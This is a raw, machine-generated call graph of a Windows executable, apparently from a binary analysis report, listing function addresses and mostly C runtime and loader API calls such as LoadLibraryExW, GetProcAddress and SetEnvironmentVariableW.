7ff6fb1e2760 53 API calls 17344->17345 17345->17350 17346 7ff6fb1ef36c 74 API calls 17348 7ff6fb1e1584 17346->17348 17355 7ff6fb1e11f0 17347->17355 17348->16088 17350->17346 17351 7ff6fb1ef6bc _fread_nolock 53 API calls 17351->17352 17352->17350 17352->17351 17353 7ff6fb1e1596 17352->17353 17354 7ff6fb1e2760 53 API calls 17353->17354 17354->17350 17356 7ff6fb1e1248 17355->17356 17357 7ff6fb1e124f 17356->17357 17358 7ff6fb1e1277 17356->17358 17359 7ff6fb1e25f0 53 API calls 17357->17359 17361 7ff6fb1e1291 17358->17361 17362 7ff6fb1e12ad 17358->17362 17360 7ff6fb1e1262 17359->17360 17360->17350 17363 7ff6fb1e2760 53 API calls 17361->17363 17364 7ff6fb1e12bf 17362->17364 17367 7ff6fb1e12db memcpy_s 17362->17367 17368 7ff6fb1e12a8 __std_exception_destroy 17363->17368 17365 7ff6fb1e2760 53 API calls 17364->17365 17365->17368 17366 7ff6fb1ef6bc _fread_nolock 53 API calls 17366->17367 17367->17366 17367->17368 17369 7ff6fb1e139f 17367->17369 17372 7ff6fb1ef430 37 API calls 17367->17372 17373 7ff6fb1efdfc 17367->17373 17368->17350 17372->17367 17393 7ff6fb1e3f1a 17392->17393 17394 7ff6fb1e86b0 2 API calls 17393->17394 17395 7ff6fb1e3f3f 17394->17395 17396 7ff6fb1eb870 _log10_special 8 API calls 17395->17396 17397 7ff6fb1e3f67 17396->17397 17397->16117 17399 7ff6fb1e753e 17398->17399 17400 7ff6fb1e7662 17399->17400 17401 7ff6fb1e1bf0 49 API calls 17399->17401 17402 7ff6fb1eb870 _log10_special 8 API calls 17400->17402 17407 7ff6fb1e75c5 17401->17407 17403 7ff6fb1e7693 17402->17403 17403->16117 17404 7ff6fb1e1bf0 49 API calls 17404->17407 17405 7ff6fb1e3f10 10 API calls 17405->17407 17406 7ff6fb1e761b 17408 7ff6fb1e86b0 2 API calls 17406->17408 17407->17400 17407->17404 17407->17405 17407->17406 17409 7ff6fb1e7633 CreateDirectoryW 17408->17409 17409->17400 17409->17407 17411 7ff6fb1e15d3 17410->17411 17412 7ff6fb1e15f7 17410->17412 17499 7ff6fb1e1050 17411->17499 17413 7ff6fb1e3f70 108 API calls 17412->17413 17415 7ff6fb1e160b 17413->17415 17418 7ff6fb1e1613 17415->17418 17419 7ff6fb1e163b 17415->17419 17416 7ff6fb1e15ee 17416->16117 17417 7ff6fb1e15d8 17417->17416 17420 7ff6fb1e25f0 53 API calls 17417->17420 17421 7ff6fb1e2760 53 API calls 17418->17421 17422 7ff6fb1e3f70 108 API calls 17419->17422 17420->17416 17423 7ff6fb1e162a 17421->17423 17424 7ff6fb1e164f 17422->17424 17423->16117 17425 7ff6fb1e1671 17424->17425 17426 7ff6fb1e1657 17424->17426 17427 7ff6fb1ef9f4 73 API calls 17425->17427 17428 7ff6fb1e25f0 53 API calls 17426->17428 17429 7ff6fb1e1686 17427->17429 17430 7ff6fb1e1667 17428->17430 17450 7ff6fb1e694b 17448->17450 17451 7ff6fb1e6904 17448->17451 17450->16117 17451->17450 17538 7ff6fb1f4250 17451->17538 17453 7ff6fb1e3b51 17452->17453 17454 7ff6fb1e3e90 49 API calls 17453->17454 17455 7ff6fb1e3b8b 17454->17455 17456 7ff6fb1e3e90 49 API calls 17455->17456 17457 7ff6fb1e3b9b 17456->17457 17458 7ff6fb1e3bbd 17457->17458 17459 7ff6fb1e3bec 17457->17459 17569 7ff6fb1e3ac0 17458->17569 17461 7ff6fb1e3ac0 51 API calls 17459->17461 17462 7ff6fb1e3bea 17461->17462 17497 7ff6fb1e1bf0 49 API calls 17496->17497 17498 7ff6fb1e3e24 17497->17498 17498->16117 17500 7ff6fb1e3f70 108 API calls 17499->17500 17501 7ff6fb1e108b 17500->17501 17502 7ff6fb1e1093 17501->17502 17503 7ff6fb1e10a8 17501->17503 17505 7ff6fb1e25f0 53 API calls 17502->17505 17504 7ff6fb1ef9f4 73 API calls 17503->17504 17506 7ff6fb1e10bd 17504->17506 17510 7ff6fb1e10a3 __std_exception_destroy 17505->17510 17507 7ff6fb1e10c1 17506->17507 17508 7ff6fb1e10dd 17506->17508 17510->17417 17539 7ff6fb1f425d 17538->17539 17540 7ff6fb1f428a 17538->17540 17541 7ff6fb1f43f4 _get_daylight 11 API calls 17539->17541 17542 7ff6fb1f4214 17539->17542 17543 7ff6fb1f42ad 17540->17543 17546 7ff6fb1f42c9 17540->17546 17544 7ff6fb1f4267 17541->17544 17542->17451 17545 7ff6fb1f43f4 _get_daylight 11 API calls 17543->17545 17547 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17544->17547 17548 7ff6fb1f42b2 17545->17548 17553 7ff6fb1f4178 17546->17553 17550 7ff6fb1f4272 17547->17550 17551 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17548->17551 17550->17451 17552 7ff6fb1f42bd 17551->17552 17552->17451 17554 7ff6fb1f419c 17553->17554 17560 7ff6fb1f4197 17553->17560 17555 7ff6fb1fa460 __GetCurrentState 45 API calls 17554->17555 17554->17560 17556 7ff6fb1f41b7 17555->17556 17561 7ff6fb1fcc94 17556->17561 17560->17552 17570 7ff6fb1e3ae6 17569->17570 17571 7ff6fb1f3ca4 49 API calls 17570->17571 17633 7ff6fb1ebe12 RtlLookupFunctionEntry 17632->17633 17634 7ff6fb1ebc2b 17633->17634 17635 7ff6fb1ebe28 RtlVirtualUnwind 17633->17635 17636 7ff6fb1ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17634->17636 17635->17633 17635->17634 17638 7ff6fb1f51d8 17637->17638 17639 7ff6fb1f51fe 17638->17639 17642 7ff6fb1f5231 17638->17642 17640 7ff6fb1f43f4 _get_daylight 11 API calls 17639->17640 17641 7ff6fb1f5203 17640->17641 17643 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17641->17643 17644 7ff6fb1f5244 17642->17644 17645 7ff6fb1f5237 17642->17645 17646 7ff6fb1e3fc6 17643->17646 17656 7ff6fb1f9f38 17644->17656 17647 7ff6fb1f43f4 _get_daylight 11 API calls 17645->17647 17646->16149 17647->17646 17669 7ff6fb1ff5e8 EnterCriticalSection 17656->17669 18030 7ff6fb1f6c08 18029->18030 18033 7ff6fb1f66e4 18030->18033 18032 7ff6fb1f6c21 18032->16159 18034 7ff6fb1f672e 18033->18034 18035 7ff6fb1f66ff 18033->18035 18043 7ff6fb1f477c EnterCriticalSection 18034->18043 18036 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 18035->18036 18042 7ff6fb1f671f 18036->18042 18042->18032 18045 7ff6fb1ef163 18044->18045 18046 7ff6fb1ef191 18044->18046 18047 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 18045->18047 18053 7ff6fb1ef183 18046->18053 18054 7ff6fb1f477c EnterCriticalSection 18046->18054 18047->18053 18053->16163 18056 7ff6fb1e86b0 2 API calls 18055->18056 18057 7ff6fb1e81b4 LoadLibraryExW 18056->18057 18058 7ff6fb1e81d3 __std_exception_destroy 18057->18058 18058->16193 18060 7ff6fb1e6ef3 GetProcAddress 18059->18060 18061 7ff6fb1e6ec9 18059->18061 18060->18061 18062 7ff6fb1e6f18 GetProcAddress 18060->18062 18064 7ff6fb1e29e0 51 API calls 18061->18064 18062->18061 18063 7ff6fb1e6f3d GetProcAddress 18062->18063 18063->18061 18066 7ff6fb1e6ee3 18064->18066 18066->16199 18125 7ff6fb1e5b05 18124->18125 18126 7ff6fb1e1bf0 49 API calls 18125->18126 18127 7ff6fb1e5b41 18126->18127 18128 7ff6fb1e5b4a 18127->18128 18129 7ff6fb1e5b6d 18127->18129 18130 7ff6fb1e25f0 53 API calls 18128->18130 18131 7ff6fb1e3fe0 49 API calls 18129->18131 18147 7ff6fb1e5b63 18130->18147 18132 7ff6fb1e5b85 18131->18132 18133 7ff6fb1e5ba3 18132->18133 18134 7ff6fb1e25f0 53 API calls 18132->18134 18135 7ff6fb1e3f10 10 API calls 18133->18135 18134->18133 18138 7ff6fb1e5bad 18135->18138 18136 7ff6fb1eb870 _log10_special 8 API calls 18137 7ff6fb1e308e 18136->18137 18137->16228 18155 7ff6fb1e5c80 18137->18155 18139 7ff6fb1e5bbb 18138->18139 18140 7ff6fb1e81a0 3 API calls 18138->18140 18141 7ff6fb1e3fe0 49 API calls 18139->18141 18140->18139 18142 7ff6fb1e5bd4 18141->18142 18143 7ff6fb1e5bf9 18142->18143 18144 7ff6fb1e5bd9 18142->18144 18146 7ff6fb1e81a0 3 API calls 18143->18146 18145 7ff6fb1e25f0 53 API calls 18144->18145 18145->18147 18148 7ff6fb1e5c06 18146->18148 18147->18136 18294 7ff6fb1e4c80 18155->18294 18157 7ff6fb1e5cba 18158 7ff6fb1e5cd3 18157->18158 18159 7ff6fb1e5cc2 18157->18159 18301 7ff6fb1e4450 18158->18301 18160 7ff6fb1e25f0 53 API calls 18159->18160 18296 7ff6fb1e4cac 18294->18296 18295 7ff6fb1e4cb4 18295->18157 18296->18295 18299 7ff6fb1e4e54 18296->18299 18332 7ff6fb1f5db4 18296->18332 18297 7ff6fb1e5017 __std_exception_destroy 18297->18157 18298 7ff6fb1e4180 47 API calls 18298->18299 18299->18297 18299->18298 18333 7ff6fb1f5de4 18332->18333 18336 7ff6fb1f52b0 18333->18336 18337 7ff6fb1f52f3 18336->18337 18338 7ff6fb1f52e1 18336->18338 18340 7ff6fb1f533d 18337->18340 18342 7ff6fb1f5300 18337->18342 18339 7ff6fb1f43f4 _get_daylight 11 API calls 18338->18339 18412->16236 18414 7ff6fb1fa460 __GetCurrentState 45 API calls 18413->18414 18415 7ff6fb1f96f1 18414->18415 18418 7ff6fb1f9814 18415->18418 18427 7ff6fb202960 18418->18427 18453 7ff6fb202918 18427->18453 18458 7ff6fb1ff5e8 EnterCriticalSection 18453->18458 19453 7ff6fb1ffbd8 19454 7ff6fb1ffbfc 19453->19454 19457 7ff6fb1ffc0c 19453->19457 19455 7ff6fb1f43f4 _get_daylight 11 API calls 19454->19455 19456 7ff6fb1ffc01 19455->19456 19458 7ff6fb1ffeec 19457->19458 19459 7ff6fb1ffc2e 19457->19459 19460 7ff6fb1f43f4 _get_daylight 11 API calls 19458->19460 19463 7ff6fb1ffc4f 19459->19463 19584 7ff6fb200294 19459->19584 19461 7ff6fb1ffef1 19460->19461 19462 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19461->19462 19462->19456 19465 7ff6fb1ffcc1 19463->19465 19467 7ff6fb1ffc75 19463->19467 19471 7ff6fb1ffcb5 19463->19471 19469 7ff6fb1fdea8 _get_daylight 11 API calls 19465->19469 19482 7ff6fb1ffc84 19465->19482 19466 7ff6fb1ffd6e 19478 7ff6fb1ffd8b 19466->19478 19483 7ff6fb1ffddd 19466->19483 19599 7ff6fb1f89d8 19467->19599 19472 7ff6fb1ffcd7 19469->19472 19471->19466 19471->19482 19605 7ff6fb20643c 19471->19605 19475 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19472->19475 19474 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19474->19456 19479 7ff6fb1ffce5 19475->19479 19476 7ff6fb1ffc7f 19480 7ff6fb1f43f4 _get_daylight 11 API calls 19476->19480 19477 7ff6fb1ffc9d 19477->19471 19485 7ff6fb200294 45 API calls 19477->19485 19481 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19478->19481 19479->19471 19479->19482 19487 7ff6fb1fdea8 _get_daylight 11 API calls 19479->19487 19480->19482 19484 7ff6fb1ffd94 19481->19484 19482->19474 19483->19482 19486 7ff6fb2026ec 40 API calls 19483->19486 19494 7ff6fb1ffd99 19484->19494 19641 7ff6fb2026ec 19484->19641 19485->19471 19488 7ff6fb1ffe1a 19486->19488 19490 7ff6fb1ffd07 19487->19490 19491 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19488->19491 19495 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19490->19495 19496 7ff6fb1ffe24 19491->19496 19492 7ff6fb1ffdc5 19497 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19492->19497 19493 7ff6fb1ffee0 19498 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19493->19498 19494->19493 19499 7ff6fb1fdea8 _get_daylight 11 API calls 19494->19499 19495->19471 19496->19482 19496->19494 19497->19494 19498->19456 19500 7ff6fb1ffe68 19499->19500 19501 7ff6fb1ffe70 19500->19501 19502 7ff6fb1ffe79 19500->19502 19503 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19501->19503 19504 7ff6fb1f97b4 __std_exception_copy 37 API calls 19502->19504 19505 7ff6fb1ffe77 19503->19505 19506 7ff6fb1ffe88 19504->19506 19510 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19505->19510 19507 7ff6fb1ffe90 19506->19507 19508 7ff6fb1fff1b 19506->19508 19650 7ff6fb206554 19507->19650 19509 7ff6fb1f9c10 _isindst 17 API calls 19508->19509 19513 7ff6fb1fff2f 19509->19513 19510->19456 19516 7ff6fb1fff58 19513->19516 19522 7ff6fb1fff68 19513->19522 19514 7ff6fb1ffed8 19519 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19514->19519 19515 7ff6fb1ffeb7 19517 7ff6fb1f43f4 _get_daylight 11 API calls 19515->19517 19518 7ff6fb1f43f4 _get_daylight 11 API calls 19516->19518 19520 7ff6fb1ffebc 19517->19520 19546 7ff6fb1fff5d 19518->19546 19519->19493 19521 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19520->19521 19521->19505 19523 7ff6fb20024b 19522->19523 19524 7ff6fb1fff8a 19522->19524 19525 7ff6fb1f43f4 _get_daylight 11 API calls 19523->19525 19527 7ff6fb1fffa7 19524->19527 19669 7ff6fb20037c 19524->19669 19526 7ff6fb200250 19525->19526 19529 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19526->19529 19530 7ff6fb20001b 19527->19530 19532 7ff6fb1fffcf 19527->19532 19536 7ff6fb20000f 19527->19536 19529->19546 19534 7ff6fb200043 19530->19534 19537 7ff6fb1fdea8 _get_daylight 11 API calls 19530->19537 19552 7ff6fb1fffde 19530->19552 19531 7ff6fb2000ce 19545 7ff6fb2000eb 19531->19545 19553 7ff6fb20013e 19531->19553 19684 7ff6fb1f8a14 19532->19684 19534->19536 19539 7ff6fb1fdea8 _get_daylight 11 API calls 19534->19539 19534->19552 19536->19531 19536->19552 19690 7ff6fb2062fc 19536->19690 19541 7ff6fb200035 19537->19541 19544 7ff6fb200065 19539->19544 19540 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19540->19546 19547 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19541->19547 19542 7ff6fb1fffd9 19548 7ff6fb1f43f4 _get_daylight 11 API calls 19542->19548 19543 7ff6fb1ffff7 19543->19536 19551 7ff6fb20037c 45 API calls 19543->19551 19549 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19544->19549 19550 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19545->19550 19547->19534 19548->19552 19549->19536 19554 7ff6fb2000f4 19550->19554 19551->19536 19552->19540 19553->19552 19555 7ff6fb2026ec 40 API calls 19553->19555 19558 7ff6fb2026ec 40 API calls 19554->19558 19561 7ff6fb2000fa 19554->19561 19556 7ff6fb20017c 19555->19556 19557 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19556->19557 19559 7ff6fb200186 19557->19559 19562 7ff6fb200126 19558->19562 19559->19552 19559->19561 19560 7ff6fb20023f 19564 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19560->19564 19561->19560 19565 7ff6fb1fdea8 _get_daylight 11 API calls 19561->19565 19563 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19562->19563 19563->19561 19564->19546 19566 7ff6fb2001cb 19565->19566 19567 7ff6fb2001d3 19566->19567 19568 7ff6fb2001dc 19566->19568 19569 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19567->19569 19570 7ff6fb1ff784 37 API calls 19568->19570 19571 7ff6fb2001da 19569->19571 19572 7ff6fb2001ea 19570->19572 19578 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19571->19578 19573 7ff6fb2001f2 SetEnvironmentVariableW 19572->19573 19574 7ff6fb20027f 19572->19574 19575 7ff6fb200237 19573->19575 19576 7ff6fb200216 19573->19576 19577 7ff6fb1f9c10 _isindst 17 API calls 19574->19577 19581 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19575->19581 19579 7ff6fb1f43f4 _get_daylight 11 API calls 19576->19579 19580 7ff6fb200293 19577->19580 19578->19546 19582 7ff6fb20021b 19579->19582 19581->19560 19583 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19582->19583 19583->19571 19585 7ff6fb2002c9 19584->19585 19592 7ff6fb2002b1 19584->19592 19586 7ff6fb1fdea8 _get_daylight 11 API calls 19585->19586 19595 7ff6fb2002ed 19586->19595 19587 7ff6fb200372 19589 7ff6fb1f9814 __GetCurrentState 45 API calls 19587->19589 19588 7ff6fb20034e 19591 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19588->19591 19590 7ff6fb200378 19589->19590 19591->19592 19592->19463 19593 7ff6fb1fdea8 _get_daylight 11 API calls 19593->19595 19594 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19594->19595 19595->19587 19595->19588 19595->19593 19595->19594 19596 7ff6fb1f97b4 __std_exception_copy 37 API calls 19595->19596 19597 7ff6fb20035d 19595->19597 19596->19595 19598 7ff6fb1f9c10 _isindst 17 API calls 19597->19598 19598->19587 19600 7ff6fb1f89e8 19599->19600 19603 7ff6fb1f89f1 19599->19603 19600->19603 19714 7ff6fb1f84b0 19600->19714 19603->19476 19603->19477 19606 7ff6fb205564 19605->19606 19607 7ff6fb206449 19605->19607 19608 7ff6fb205571 19606->19608 19612 7ff6fb2055a7 19606->19612 19609 7ff6fb1f4178 45 API calls 19607->19609 19610 7ff6fb1f43f4 _get_daylight 11 API calls 19608->19610 19625 7ff6fb205518 19608->19625 19614 7ff6fb20647d 19609->19614 19615 7ff6fb20557b 19610->19615 19611 7ff6fb2055d1 19616 7ff6fb1f43f4 _get_daylight 11 API calls 19611->19616 19612->19611 19617 7ff6fb2055f6 19612->19617 19613 7ff6fb206482 19613->19471 19614->19613 19618 7ff6fb206493 19614->19618 19621 7ff6fb2064aa 19614->19621 19619 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19615->19619 19620 7ff6fb2055d6 19616->19620 19626 7ff6fb1f4178 45 API calls 19617->19626 19632 7ff6fb2055e1 19617->19632 19622 7ff6fb1f43f4 _get_daylight 11 API calls 19618->19622 19623 7ff6fb205586 19619->19623 19624 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19620->19624 19628 7ff6fb2064b4 19621->19628 19629 7ff6fb2064c6 19621->19629 19627 7ff6fb206498 19622->19627 19623->19471 19624->19632 19625->19471 19626->19632 19633 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19627->19633 19634 7ff6fb1f43f4 _get_daylight 11 API calls 19628->19634 19630 7ff6fb2064ee 19629->19630 19631 7ff6fb2064d7 19629->19631 19940 7ff6fb20825c 19630->19940 19931 7ff6fb2055b4 19631->19931 19632->19471 19633->19613 19637 7ff6fb2064b9 19634->19637 19639 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19637->19639 19639->19613 19640 7ff6fb1f43f4 _get_daylight 11 API calls 19640->19613 19642 7ff6fb20270e 19641->19642 19643 7ff6fb20272b 19641->19643 19642->19643 19645 7ff6fb20271c 19642->19645 19644 7ff6fb202735 19643->19644 19980 7ff6fb206f48 19643->19980 19987 7ff6fb206f84 19644->19987 19647 7ff6fb1f43f4 _get_daylight 11 API calls 19645->19647 19649 7ff6fb202721 memcpy_s 19647->19649 19649->19492 19651 7ff6fb1f4178 45 API calls 19650->19651 19652 7ff6fb2065ba 19651->19652 19653 7ff6fb2065c8 19652->19653 19999 7ff6fb1fe234 19652->19999 20002 7ff6fb1f47bc 19653->20002 19657 7ff6fb2066b4 19660 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19657->19660 19662 7ff6fb2066c5 19657->19662 19658 7ff6fb1f4178 45 API calls 19659 7ff6fb206637 19658->19659 19663 7ff6fb1fe234 5 API calls 19659->19663 19666 7ff6fb206640 19659->19666 19660->19662 19661 7ff6fb1ffeb3 19661->19514 19661->19515 19662->19661 19664 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19662->19664 19663->19666 19664->19661 19665 7ff6fb1f47bc 14 API calls 19667 7ff6fb20669b 19665->19667 19666->19665 19667->19657 19668 7ff6fb2066a3 SetEnvironmentVariableW 19667->19668 19668->19657 19670 7ff6fb20039f 19669->19670 19671 7ff6fb2003bc 19669->19671 19670->19527 19672 7ff6fb1fdea8 _get_daylight 11 API calls 19671->19672 19679 7ff6fb2003e0 19672->19679 19673 7ff6fb200464 19675 7ff6fb1f9814 __GetCurrentState 45 API calls 19673->19675 19674 7ff6fb200441 19677 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19674->19677 19676 7ff6fb20046a 19675->19676 19677->19670 19678 7ff6fb1fdea8 _get_daylight 11 API calls 19678->19679 19679->19673 19679->19674 19679->19678 19680 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19679->19680 19681 7ff6fb1ff784 37 API calls 19679->19681 19682 7ff6fb200450 19679->19682 19680->19679 19681->19679 19683 7ff6fb1f9c10 _isindst 17 API calls 19682->19683 19683->19673 19685 7ff6fb1f8a24 19684->19685 19688 7ff6fb1f8a2d 19684->19688 19685->19688 20024 7ff6fb1f8524 19685->20024 19688->19542 19688->19543 19691 7ff6fb206309 19690->19691 19694 7ff6fb206336 19690->19694 19692 7ff6fb20630e 19691->19692 19691->19694 19693 7ff6fb1f43f4 _get_daylight 11 API calls 19692->19693 19696 7ff6fb206313 19693->19696 19695 7ff6fb20637a 19694->19695 19698 7ff6fb206399 19694->19698 19712 7ff6fb20636e __crtLCMapStringW 19694->19712 19697 7ff6fb1f43f4 _get_daylight 11 API calls 19695->19697 19699 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19696->19699 19700 7ff6fb20637f 19697->19700 19701 7ff6fb2063b5 19698->19701 19702 7ff6fb2063a3 19698->19702 19703 7ff6fb20631e 19699->19703 19705 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19700->19705 19704 7ff6fb1f4178 45 API calls 19701->19704 19706 7ff6fb1f43f4 _get_daylight 11 API calls 19702->19706 19703->19536 19707 7ff6fb2063c2 19704->19707 19705->19712 19708 7ff6fb2063a8 19706->19708 19707->19712 20071 7ff6fb207e18 19707->20071 19709 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19708->19709 19709->19712 19712->19536 19713 7ff6fb1f43f4 _get_daylight 11 API calls 19713->19712 19715 7ff6fb1f84c9 19714->19715 19724 7ff6fb1f84c5 19714->19724 19737 7ff6fb201900 19715->19737 19720 7ff6fb1f84db 19722 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19720->19722 19721 7ff6fb1f84e7 19763 7ff6fb1f8594 19721->19763 19722->19724 19724->19603 19729 7ff6fb1f8804 19724->19729 19726 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19727 7ff6fb1f850e 19726->19727 19728 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19727->19728 19728->19724 19730 7ff6fb1f882d 19729->19730 19731 7ff6fb1f8846 19729->19731 19730->19603 19731->19730 19732 7ff6fb1fdea8 _get_daylight 11 API calls 19731->19732 19733 7ff6fb1f88d6 19731->19733 19734 7ff6fb1ffaf8 WideCharToMultiByte 19731->19734 19736 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19731->19736 19732->19731 19735 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19733->19735 19734->19731 19735->19730 19736->19731 19738 7ff6fb20190d 19737->19738 19739 7ff6fb1f84ce 19737->19739 19782 7ff6fb1fa534 19738->19782 19743 7ff6fb201c3c GetEnvironmentStringsW 19739->19743 19744 7ff6fb1f84d3 19743->19744 19745 7ff6fb201c6c 19743->19745 19744->19720 19744->19721 19746 7ff6fb1ffaf8 WideCharToMultiByte 19745->19746 19748 7ff6fb201cbd 19746->19748 19747 7ff6fb201cc4 FreeEnvironmentStringsW 19747->19744 19748->19747 19749 7ff6fb1fc90c _fread_nolock 12 API calls 19748->19749 19750 7ff6fb201cd7 19749->19750 19751 7ff6fb201cdf 19750->19751 19752 7ff6fb201ce8 19750->19752 19753 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19751->19753 19754 7ff6fb1ffaf8 WideCharToMultiByte 19752->19754 19755 7ff6fb201ce6 19753->19755 19756 7ff6fb201d0b 19754->19756 19755->19747 19757 7ff6fb201d0f 19756->19757 19758 7ff6fb201d19 19756->19758 19759 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19757->19759 19760 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19758->19760 19761 7ff6fb201d17 FreeEnvironmentStringsW 19759->19761 19760->19761 19761->19744 19764 7ff6fb1f85b9 19763->19764 19765 7ff6fb1fdea8 _get_daylight 11 API calls 19764->19765 19778 7ff6fb1f85ef 19765->19778 19766 7ff6fb1f85f7 19767 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19766->19767 19768 7ff6fb1f84ef 19767->19768 19768->19726 19769 7ff6fb1f866a 19770 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19769->19770 19770->19768 19771 7ff6fb1fdea8 _get_daylight 11 API calls 19771->19778 19772 7ff6fb1f8659 19773 7ff6fb1f87c0 11 API calls 19772->19773 19775 7ff6fb1f8661 19773->19775 19774 7ff6fb1f97b4 __std_exception_copy 37 API calls 19774->19778 19776 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19775->19776 19776->19766 19777 7ff6fb1f868f 19779 7ff6fb1f9c10 _isindst 17 API calls 19777->19779 19778->19766 19778->19769 19778->19771 19778->19772 19778->19774 19778->19777 19780 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19778->19780 19781 7ff6fb1f86a2 19779->19781 19780->19778 19783 7ff6fb1fa545 FlsGetValue 19782->19783 19784 7ff6fb1fa560 FlsSetValue 19782->19784 19785 7ff6fb1fa552 19783->19785 19786 7ff6fb1fa55a 19783->19786 19784->19785 19787 7ff6fb1fa56d 19784->19787 19788 7ff6fb1f9814 __GetCurrentState 45 API calls 19785->19788 19790 7ff6fb1fa558 19785->19790 19786->19784 19789 7ff6fb1fdea8 _get_daylight 11 API calls 19787->19789 19791 7ff6fb1fa5d5 19788->19791 19792 7ff6fb1fa57c 19789->19792 19802 7ff6fb2015d4 19790->19802 19793 7ff6fb1fa59a FlsSetValue 19792->19793 19794 7ff6fb1fa58a FlsSetValue 19792->19794 19795 7ff6fb1fa5b8 19793->19795 19796 7ff6fb1fa5a6 FlsSetValue 19793->19796 19797 7ff6fb1fa593 19794->19797 19798 7ff6fb1fa204 _get_daylight 11 API calls 19795->19798 19796->19797 19799 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19797->19799 19800 7ff6fb1fa5c0 19798->19800 19799->19785 19801 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19800->19801 19801->19790 19825 7ff6fb201844 19802->19825 19804 7ff6fb201609 19840 7ff6fb2012d4 19804->19840 19807 7ff6fb201626 19807->19739 19808 7ff6fb1fc90c _fread_nolock 12 API calls 19809 7ff6fb201637 19808->19809 19810 7ff6fb20163f 19809->19810 19812 7ff6fb20164e 19809->19812 19811 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19810->19811 19811->19807 19812->19812 19847 7ff6fb20197c 19812->19847 19815 7ff6fb20174a 19816 7ff6fb1f43f4 _get_daylight 11 API calls 19815->19816 19817 7ff6fb20174f 19816->19817 19819 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19817->19819 19818 7ff6fb2017a5 19821 7ff6fb20180c 19818->19821 19858 7ff6fb201104 19818->19858 19819->19807 19820 7ff6fb201764 19820->19818 19823 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19820->19823 19822 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19821->19822 19822->19807 19823->19818 19826 7ff6fb201867 19825->19826 19827 7ff6fb201871 19826->19827 19873 7ff6fb1ff5e8 EnterCriticalSection 19826->19873 19830 7ff6fb2018e3 19827->19830 19833 7ff6fb1f9814 __GetCurrentState 45 API calls 19827->19833 